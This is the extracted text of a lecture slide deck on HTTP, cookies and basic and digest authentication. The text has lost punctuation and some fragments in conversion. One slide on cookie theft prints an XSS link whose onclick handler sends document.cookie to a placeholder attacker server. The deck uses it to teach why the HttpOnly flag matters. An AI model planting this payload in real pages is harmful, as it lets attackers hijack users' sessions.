Cookies - PowerPoint PPT Presentation

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* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * HTTP authentication The HTTP protocol includes the basic ... – PowerPoint PPT presentation

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Provided by: alessand102


Transcript and Presenter's Notes

Title: Cookies

Cookies Friends
The HTTP message format
  • Two types request, response
  • HTTP request message

Request Command line (GET, POST, HEAD)
GET /somedir/page.html HTTP/1.1 Host User-agent
Mozilla/4.0 Connection close Accept-languagefr
(extra carriage return, line feed)
CRLF tells end of message
General format
Data transmission client?server
  • POST Method
  • Necessary if data exceeds URL length
  • Data is encoded in message body
  • Encode data in URLs
  • Use the GET command
  • Data is encoded within URL
HTTP Commands
  • HTTP/1.0
  • GET
  • POST
  • HEAD
  • Ask only for information about a resource
  • HTTP/1.1
  • PUT
  • File upload
  • File deletion

Response Message
Status line (error code and sentence)
HTTP/1.1 200 OK Connection close Date Thu, 06
Aug 1998 120015 GMT Server Apache/1.3.0
(Unix) Last-Modified Mon, 22 Jun 1998 ...
Content-Length 6821 Content-Type text/html
data data data data data ...
Data, e.g. a HTML document
Error codes
They stay in the first line of the response Some
  • 200 OK
  • request OK, object content follows
  • 301 Moved Permanently
  • The requested object has been moved, find its new
    position in the Location header
  • 400 Bad Request
  • What the hell are you saying?
  • 404 Not Found
  • There is no object with such an URL
  • 505 HTTP Version Not Supported

User-server state cookies
  • Many major Web sites use cookies
  • Four components
  • 1) Set-Cookie header line of HTTP response
  • 2) Cookie header line in HTTP request message
  • 3) Cookie file kept on users host, managed by
    users browser
  • 4) Possible back-end database at Web site
  • Example
  • Susan always accesses Internet from PC
  • She visits a specific e-commerce site for first
  • When initial HTTP requests arrives at site, site
  • unique ID
  • entry in backend database for ID

Cookies keeping state
Amazon server creates ID 1678 for user
cookie- specific action
one week later
cookie- spectific action
Cookies (continued)
  • Cookies privacy
  • cookies permit sites to learn a lot about you
  • the search engines use redirection and cookies
    for many purposes
  • cookies can be exchanged from one site to another
  • What cookies can help for
  • authorization
  • shopping carts
  • recommendations
  • user session state (e.g. Web e-mail)

Uses Session management
  • Used to maintain data related to the user during
    navigation, possibly across multiple visits
  •  Cookies were introduced to provide a way to
    implement a "shopping cart" (or "shopping
    basket"), a virtual device into which users can
    store items they want to purchase as they
    navigate throughout the site
  • Today the basket contents are stored in a
    database on the server side, rather than storing
    basket items in the cookie itself. A web server
    typically sends a cookie containing a unique
    session identifier. The web browser will send
    back that session identifier with each subsequent
    request and shopping basket items are stored
    associated with a unique session identifier
  • Used to allow users to log into a website
  • Before authentication, the web server will first
    set a cookie containing a unique session
  • Users then submit their credentials and the web
    application authenticates the session and allows
    the user access to services

Uses Personalization
  • Cookies may be used to remember the information
    about the user who has visited a website in order
    to show relevant content in the future
  • A web server may send a cookie containing the
    username last used to log into a website so that
    it may be filled in for future visits
  • Many websites use cookies for personalization base
    d on users' preferences.
  • Users select their preferences by entering them
    in a web form and submitting the form to the
  • The server encodes the preferences in a cookie
    and sends the cookie back to the browser.
  • Every time the user accesses a page, the server
    is also sent the cookie where the preferences are
    stored, and can personalize the page according to
    the user preferences.
  • Wikipedia website allows authenticated users to
    choose the webpage skin they like best
    the Google search engine once allowed users (even
    non-registered ones) to decide how many search
    results per page they want to see

Uses Tracking
  • Tracking cookies may be used to track internet
    users' web browsing
  • If the user requests a page of a given site, but
    the request contains no cookie, the server
    presumes that this is the first page visited by
    the user the server creates a random string and
    sends it as a cookie back to the browser together
    with the requested page
  • From this point on, the cookie will automatically
    be sent by the browser to the server every time a
    new page from the site is requested the server
    sends the page as usual, but also stores the URL
    of the requested page, the date/time of the
    request, and the cookie in a log file.
  • By analyzing the log file collected in the
    process, it is then possible to find out which
    pages the user has visited, in what sequence, for
    how long, no matter of his IP number.
  • Tracking on a site used to produce statistics
  • Tracking on multiple sites is used to produce
    anonymous user profiles
  • Useful for determining what kind of
    advertisements should be shown to users
  • A tracking cookie may violate a user's privacy
  • Can be removed, many web browsers offer
    functionality in this sense

Third-party cookies
  • While rendering the page, the browser downloads
    all these objects. Most modern websites that you
    view contain information from lots of different
    sources. While this information is being
    retrieved, some of these sources may set cookies
    in your browser
  • First-party cookies are cookies set with the same
    domain (or its subdomain) as your browser's
    address bar.
  • Third-party cookies are cookies set with domains
    different from the one shown on the address bar.
  • Mozilla Firefox, Internet Explorer, Opera and Goog
    le Chrome do allow third-party cookies by
    default, although users can block them
  • Third-Party cookies allow to build
    constellations of web sites and allow to track
    and build user histories across all the web

  • In the cookie one can find several attributes
  • Name/Value This is the only obligatory attribute
  • Domain Used to specify the source domain of the
  • Expires is optional, used to define the
    expiration date of the cookie 
  • Can be expressed as a date, as the maximum number
    of days or with 'Now' (implies that the cookie is
    deleted from your computer as soon as your
    browser is closed) or 'Never' (implies that the
    cookie is not subject to deadline)
  • Path specifies the URL path from which the cookie
    is sent to the end user
  • Access mode (HttpOnly) makes the cookies
    invisible to JavaScript and other client-side
    languages ??on the page
  • Secure indicates whether the cookie should be
    obligatorily transmitted with HTTPS

  • The cookie setter can specify a deletion date
  • If the cookie setter does not specify a date, the
    cookie is removed once the user quits his or her
  • Specifying a date is a way for making a cookie
    survive across sessions
  • cookies with an expiration date are called
  • A shopping site can use persistent cookies to
    store the items users have placed in their basket
  • a cookie can refer an entry in a database stored
    on the site e-shopping
  • if users quit their browser without making a
    purchase and returns later, they later still find
    the same items in the basket
  • If these cookies were not given an expiration
    date, they would expire when the browser is
  • the information about the basket content would be
  • Cookies can also be limited in scope to a
    specific domain, subdomain or path on the web
    server which created them

Setting a cookie (1)
  • Browsers request a page from web servers by
    sending them a usually short text called HTTP
  • to access the page http//
    ml, browsers connect to the server sending it a request that looks
    like the following one

GET /index.html HTTP/1.1Host
browser ? server
  • The server replies by sending the requested page
    preceded by a similar packet of text,
    called 'HTTP response'. This packet may contain
    lines requesting the browser to store cookies

HTTP/1.1 200 OKContent-type text/htmlSet-Cookie
namevalue (content of page)
browser ? server
Setting a cookie (2)
  • The server sends lines of Set-Cookie only if the
    server wishes the browser to store cookies. 
  • Set-Cookie is a directive for the browser to
    store the cookie
  • Send it back in future requests to the if the
    browser supports cookies and cookies are enabled.
  • For example, the browser requests the page
    http// by sending the
    server a request like the

GET /spec.html HTTP/1.1Host www.example.orgCook
ie namevalueAccept /
browser ? server
  • This is a request for another page from the same
    server, and differs from the first one above
    because it contains the string that the server
    has previously sent to the browser. This way, the
    server knows that this request is related to the
    previous one
  • The server answers by sending the requested page,
    possibly adding other cookies as well
  • The value of a cookie can be modified by the
    server by sending a new Set-Cookie
    namenewvalue line in response of a page request.
    The browser then replaces the old value with the
    new one

Cookie attributes (1)
  • Set-CookieNameValue EXPIRESDate PATHPath
    DOMAINDomain_Name SECURE
  • NameValue
  • is the only specification that is not optional,
    allows you to assign a name to the value to be
    stored in the client
  • Used to specify a date that defines the lifetime
    of the cookie. After this date, the cookie is
    automatically removed.
  • If not specified, the cookie is destroyed at the
    end of the user session when the browser is
  • DOMAINDomain_Name Server
  • Used to identify the domain of the cookie. Only
    hosts within the specified domain can set the
  • If the domain is not specified explicitly, is
    considered valid the server that generated the
    HTTP response.

Cookie attributes (2)
  • Set-CookieNameValue EXPIRESDate PATHPath
    DOMAINDomain_Name SECURE
  • PATHPath.
  • Used to specify the subset of the URL in the
    domain for which the cookie is valid. At the time
    of satisfying an HTTP request, if the cookie has
    already passed the check on the domain, then the
    pathname of the URL that is making the request is
    compared with this value. In case of equality the
    cookie is considered valid and is sent.
  • Without specific path is assumed to be the same
    as described in the header of the document that
    contains the cookie
  • If this clause is added, then the cookie will be
    sent only if the communications channel with the
    host is secure (ie using some technique of secure
    transmission, for example, the https protocol)

The cookies are identified by a combination of
name, domain, and path, in contrast to what
provided in the original specification of Netscape
  • Cookies are not sent to the server in the case
  • End user session (closing the browser) if the
    cookie is not persistent
  • Has been reached expiration date
  • The expiration date has been reset (by the server
    or by a script) to an earlier date, already
  • A server or a script explicitly decide to delete
  • The browser destroys the cookie in response to a
    user request

Misconceptions about Cookies..
  • are same as worms and viruses
  • they can generate pop ups
  • They are used for spamming
  • They can only be used for advertising
  • They can erase data from the user's hard disks
  • They can read personal information stored on the
    user's computer
  • Controversial EU directive 2009/136/CE, IT Law
    69-70/2012 seems requiring that web sites MUST
    ask permission for storing cookies.

Browser settings
  • Most browsers allow
  • to enable or disable cookies completely
  • to see the cookies currently stored in the
  • to selectively delete the cookies

Privacy and third-party cookies
  • third-party cookies also include those from
    unwanted pop-up ads
  • Used to track users across different sites
  • Building a user profile is potentially dangerous
    to your privacy
  • They can be disabled on most browsers

Drawbacks (1)
  • Inaccurate identification
  • If more than one browser is used on a computer,
    each usually has a separate storage area for
    cookies. Hence cookies do not identify a person,
    but a combination of a user account, a computer,
    and a Web browser.
  • Thus, anyone has multiple sets of cookies.
  • Likewise, cookies do not differentiate between
    multiple users who share the same user account,
    computer, and browser

Drawbacks (2)
  • Cookie hijacking
  • A cookie can be caught from another computer that
    is able to read from the network
  • Cookie theft is the act of intercepting cookies
    by unauthorized parties
  • Packet sniffing can contain cookies when the
    traffic traveling over unencrypted http sessions
  • Can be remedied by using Transport Layer Security
    (https) to encrypt the connection
  • Several sites while using https encrypted
    communications for user authentication in the
    later stages, for performance reasons use
    unencrypted connections. Cookies can be
    intercepted and the attacker could impersonate a
    cookie in other sites (cookiemonster attack)
  • A server can set the secure flag for a cookie. In
    this case, the browser will only send cookies
    over a secure channel, such as an SSL connection

Drawbacks (3)
  • Cross-site scripting
  • a cookie that should be only exchanged between a
    server and a client is sent elsewhere
  • Make sure that both the browser to send cookies
    to malicious server
  • Most browsers allow the execution of pieces of
    code on the client machine.
  • If cookies are accessible during execution, their
    values ??could be communicated to the malicious
    server, which should not actually have access to
  • Encrypting Cookies do not prevent this type of
  • It is a typical attack to sites that allow a user
    to publish content to html
  • Incorporating the html code into post an attacker
    could get cookies from a user
  • This attack can be prevented using the HttpOnly
    flag, an option introduced by Microsoft in
    Internet Explorer 6, you need to make the cookie
    inaccessible to client-side script

Drawbacks (4)
  • Cookie theft
  • The value of the cookie can be sent to other
    servers using means other than the header of a
    cookie, for example, scripting languages ??such
    as JavaScript and JScript can access the values
    ??of the cookies and have the ability to send
    arbitrary values ??to the servers on the Internet
    (eg XSS cross-site scripting)
  •  an attacker may post a message
    on with the following link
  • When a user clicks the link, the browser executes
    the code specified in the onclick replacing the
    string document.cookie with the list of active
    user cookies for that page. The list is sent to
    the server and the attacker will be
    able to collect the user's cookies
  • The attack is difficult to identify the user side
    because the script comes from the same domain
    that set the cookie
  • It is the responsibility of the site
    dell'amministratoire disable the posting of
    malicious code
  • Cookies are not directly visible to the
    client-side JavaScript programs as if they were
    sent with the HttpOnly flag (non-standard, not
    supported by all browsers)

lta href"" onclick"window.location'http//examp'escape(document.cookie)
return false"gtClick here!lt/agt
Drawbacks (5)
  • Cookie poisoning
  • An attacker could modify the values ??of the
    cookies before you send them back to the server
  • If a cookie contains the total to pay for items
    of a transaction, the risk is that an attacker
    could change this value and pay less than they
  • Many websites fortunately only store a session
    identifier in the cookie itself, while the other
    sensitive data are stored on the server, is what
    puts protected from similar problems
  • This attack is often used in combination with one
    cookie theft
  • Cross-site cooking
  • Enables malicious websites to modify cookies from
    other sites
  • Similar to cookie poisoning, but the attacker
    uses normal users who have some vulnerability in
    the browser, instead of directly attacking the
  • The goal is often realize session fixation
    (stolen session ID)

Drawbacks (6)
  • Inconsistent state on client and server
  • generate an inconsistency between the state of
    the client and the state as stored in the cookie
  • If the user acquires a cookie and then clicks the
    "Back" button of the browser, the state on the
    browser is generally not the same as before that
    acquisition, but for example the content of the
    cart may not change this might not be the
    intention of the user and can lead to confusion
  • Cookie expiry
  • Persistent cookies
  • A persistent cookie captured can be used to
    simulate a user for a considerable period of
    time, in the case of session hijacking

Alternatives to cookies
  • IP address
  • Some users may be tracked based on the IP
    address of the computer requesting the page
  • The mechanism is less reliable than that of a
    cookie to identify a user because computers and
    proxies can be shared by multiple users, or as
    they may change from session to session.
  • It can work in the case of always-on broadband
    connections that keep the same IP for long
    periods of time
  • Some systems, such as Tor, are designed to ensure
    anonymity on the Internet and make this

Alternatives to cookies
  • URL (query string)
  • Embedding information into URLs
  • Web server appending query strings to the links
    of a Web page it holds when sending it to a
  • When the user follows a link, the browser returns
    the attached query string to the server
  • a query string is part of a URL, if that URL is
    later reused, the same attached piece of
    information is sent to the server.
  • even if the same user accesses the same page two
    times, there is no guarantee that the same query
    string is used in both views.
  • Storing data that identifies a session in a query
    string enables or simplifies session
    fixation attacks,referrer logging attacks and
    other security exploits.

Alternatives to cookies
  • Hidden form fields
  • Using web forms with hidden fields
  • If the form is handled with the HTTP GET method,
    the fields actually become part of the URL the
    browser will send upon form submission.
  • If the form is handled with HTTP POST, which
    causes the form information, including the hidden
    fields, to be appended as extra input that is
    neither part of the URL, nor of a cookie
  • the tracking information is in the HTML source
    and POST input rather than in the URL
  • the information is not copied when the user
    copies the URL 

Alternatives to cookies
  • HTTP authentication
  • The HTTP protocol includes the basic access
    authentication and the digest access
    authentication protocols, which allow access to a
    Web page only when the user has provided the
    correct username and password.
  • If the server requires such credentials for
    granting access to a web page, the browser
    requests them from the user and, once obtained,
    the browser stores and sends them in every
    subsequent page request. This information can be
    used to track the user.

Alternatives to cookies
  • All current web browsers can store a fairly large
    amount of data (2-32 MB) via JavaScript using the
    DOM property
  • The technique can be coupled with JSON/JavaScript
    objects to store complex sets of session
    variables on the client side.
  • In some respects this can be more secure than
    cookies due to not involving the server, so it is
    not vulnerable to network cookie sniffing
  • However if special measures are not taken to
    protect the data, it is vulnerable to other
    attacks because the data is available across
    different web sites opened in the same window or

Alternatives to cookies
  • Adobe Flash Local Shared Objects
  • If a browser includes the Adobe Flash Player
    plugin (formerly developed by Macromedia), the
    Local Shared Objects functionality can be used in
    a way very similar to cookies.
  • The major drawback with this approach is the same
    as every platform/vendor-specific approach it
    breaks the web's global accessibility and
    interoperability, tying up web development to a
    specific client's platform, excluding users who
    use standards-compliant web user agents and
    instead forcing them to use platform/vendor-specif
    ic web agents, which perpetuates vendor lock-in.
  • Client-side persistence
  • HTML5 localStorage and sessionStorage variables.

Basic access authentication
  • In the context of an HTTP transaction, this is a
    method for a web browser or other client program
    to provide a user name and password when making a
  • the user name is appended with a colon and
    concatenated with the password. The resulting
    string is encoded with the Base64 algorithm, for
  • username Aladdin and password open sesame
  • the string Aladdinopen sesame is Base64 encoded
    , resulting in QWxhZGRpbjpvcGVuIHNlc2FtZQ

Basic access authentication
  • Encoded string is easily decoded
  • Security is not the intent of the encoding step
  • the intent of the encoding is to encode
    non-HTTP-compatible characters that may be in the
    user name or password into those that are

  • Is all web browsers support it.
  • Rarely it is used on publicly accessible Internet
    web sites but may sometimes be used by small,
    private systems
  • Programmers and system administrators sometimes
    use basic access authentication, in a trusted
    network environment, to manually test web servers
    using Telnet or other plain-text network tools

  • It relies on the assumption that the connection
    between the client and server computers is secure
    and can be trusted
  • if SSL/TLS is not used, then the credentials are
    passed as plaintext
  • there is no effective way for a server to "log
    out" the user without closing the browser

  • The client requests a page that requires
    authentication but does not provide a user name
    and password
  • the server responds with the 401 ("Unauthorized")
    response code, including the required
    authentication scheme and the authentication
  • the client will present the authentication realm
    (typically a description of the computer or
    system being accessed) to the user and prompt for
    a user name and password
  • once the user has supplied a user name and
    password, the client adds an Authorization header
    (with valuebase64encode(username""password))
    to the original request and re-sends it
  • the server accepts the authentication and the
    page is returned if the user name is invalid or
    the password incorrect, the server might return
    the 401 response code

Client request (no authentication)
GET /private/index.html HTTP/1.0 Host localhost
Server response
HTTP/1.0 401 Authorization Required Server
HTTPd/1.0 Date Sat, 27 Nov 2004 101815 GMT
WWW-Authenticate Basic realm"Secure Area"
Content-Type text/html Content-Length 311
Transitional//EN" "http//
tml401-19991224/loose.dtd"gt ltHTMLgt ltHEADgt
ltTITLEgtErrorlt/TITLEgt ltMETA HTTP-EQUIV"Content-T
ype" CONTENT"text/html charsetISO-8859-1"gt
lt/HEADgt ltBODYgtltH1gt401
Client request (user name "Aladdin", password
"open sesame")
GET /private/index.html HTTP/1.0 Host localhost
Authorization Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ

Server response
HTTP/1.0 200 OK Server HTTPd/1.0 Date Sat, 27
Nov 2004 101907 GMT Content-Type text/html
Content-Length 10476
Digest access authentication
  • Used to negotiate credentials with a user's web
    browser (using HTTP protocol).
  • It applies a hash function to a password before
    sending it over the network, which is safer than
    basic access authentication, which sends
  • is an application of MD5 cryptographic hashing
    with usage of nonce values to prevent

RFC 2069
RFC 2617
If the qop (Quality of Protection) directive is
"auth" or unspecified, HA2 is
If the qop directive is "auth-int" , HA2 is
If the qop directive is "auth" or "auth-int" ,
then compute the response as follows
If the qop directive is unspecified, then compute
the response as follows
MD5 Digest authentication
  • The MD5 calculations used in HTTP digest
    authentication is intended to be "one way"
  • It should be difficult to determine the original
    input when only the output is known
  • If the password itself is too simple, however,
    then it may be possible to test all possible
    inputs and find a matching output (a brute-force

  • HTTP digest authentication is designed to be more
    secure than traditional digest authentication
  • The password is not used directly in the digest,
    but rather HA1 MD5(usernamerealmpassword).
  • This allows some implementations (e.g. JBoss3)
    to store HA1 rather than the cleartext password
  • Client nonce was introduced in RFC 2617, which
    allows the client to prevent Chosen-plaintext
  • Server nonce is allowed to contain timestamps.
  • Therefore the server may inspect nonce attributes
    submitted by clients, to prevent replay attacks.
  • Server is also allowed to maintain a list of
    recently issued or used server nonce values to
    prevent reuse.

  • Digest access authentication
  • It replaces unencrypted HTTP basic access
    authentication but It doesnt replace strong
    authentication protocols, such as public-key orKer
    beros authentication.
  • Many of the security options in  RFC 2617 are
    optional. If quality-of-protection (qop) is not
    specified by the server, the client will operate
    in a security-reduced legacy mode
  • Digest access authentication  is vulnerable to
    a Man-in-the-middle
  •  For example, a MitM attacker could tell clients
    to use basic access authentication or legacy
    RFC2069 digest access authentication mode
  • Digest access authentication provides no
    mechanism for clients to verify the server's

  • The client asks for a page that requires
    authentication but does not provide
    a username and password
  • The server responds with the 401 "Unauthorized"
    response code, providing the authentication realm
    and a randomly-generated, single-use value called
    a nonce.
  • The client will present the authentication to the
    user and prompt for a username and password
  • Once a username and password have been supplied,
    the client re-sends the same request but adds an
    authentication header that includes the response
  • The server accepts the authentication and the
    page is returned. If the username is invalid
    and/or the password is incorrect, the server
    might return the "401" response code

Client request (no authentication)
GET /dir/index.html HTTP/1.0 Host localhost
Server response
HTTP/1.0 401 Unauthorized Server HTTPd/0.9
Date Sun, 10 Apr 2005 202647 GMT
WWW-Authenticate Digest realm"
m", qop"auth,auth-int",


Content-Type text/html Content-Length 311
Transitional//EN" "http//
tml401-19991224/loose.dtd"gt ltHTMLgt ltHEADgt
ltTITLEgtErrorlt/TITLEgt ltMETA HTTP-EQUIV"Content-T
ype" CONTENT"text/html charsetISO-8859-1"gt
lt/HEADgt ltBODYgtltH1gt401
Client request (user name "Mufasa", password
"Circle Of Life")
GET /dir/index.html HTTP/1.0 Host localhost
Authorization Digest username"Mufasa",
realm"", nonce"dcd98b7102dd2f0
e8b11d0f600bfb0c093", uri"/dir/index.html",
qopauth, nc00000001, cnonce"0a4f113b",
Server response
HTTP/1.0 200 OK Server HTTPd/0.9 Date Sun, 10
Apr 2005 202703 GMT Content-Type text/html
Content-Length 7984
  • The "response" value is calculated in three
  • The MD5 hash of the combined username,
    authentication realm and password is calculated.
    The result is referred to as HA1.
  • The MD5 hash of the combined method and
    digest URI is calculated, e.g. of "GET" and "/dir/
    index.html". The result is referred to as HA2.
  • The MD5 hash of the combined HA1 result, server
    nonce (nonce), request counter (nc), client nonce
    (cnonce), quality of protection code (qop) and
    HA2 result is calculated. The result is the
    "response" value provided by the client.

HA1 MD5( "Mufasatestrealm_at_host.comCircle Of
Life" ) 939e7578ed9e3c518a452acee763bce
9 HA2 MD5( "GET/dir/index.html" )
39aff3a2bab6126f332b942af96d3366 Response MD5(
\ dcd98b7102dd2f0e8b11d0f600bfb0c09
39aff3a2bab6126f332b942af96d3366" )
  • At this point the client may make another
    request, reusing the server nonce value but
    providing a new client nonce (cnonce).
  • For subsequent requests, the hexadecimal request
    counter (nc) must be greater than the last value
    it used otherwise an attacker could simply
    "replay" an old request with the same credentials
  • It is up to the server to ensure that the counter
    increases for each of the nonce values that it
    has issued, rejecting any bad requests
  • The server should remember nonce values that it
    has recently generated. It may also remember when
    each nonce value was issued, expiring them after
    a certain amount of time
  • he server does not need to keep any expired nonce
    values, but  it can simply assume that any
    unrecognised values have expired.
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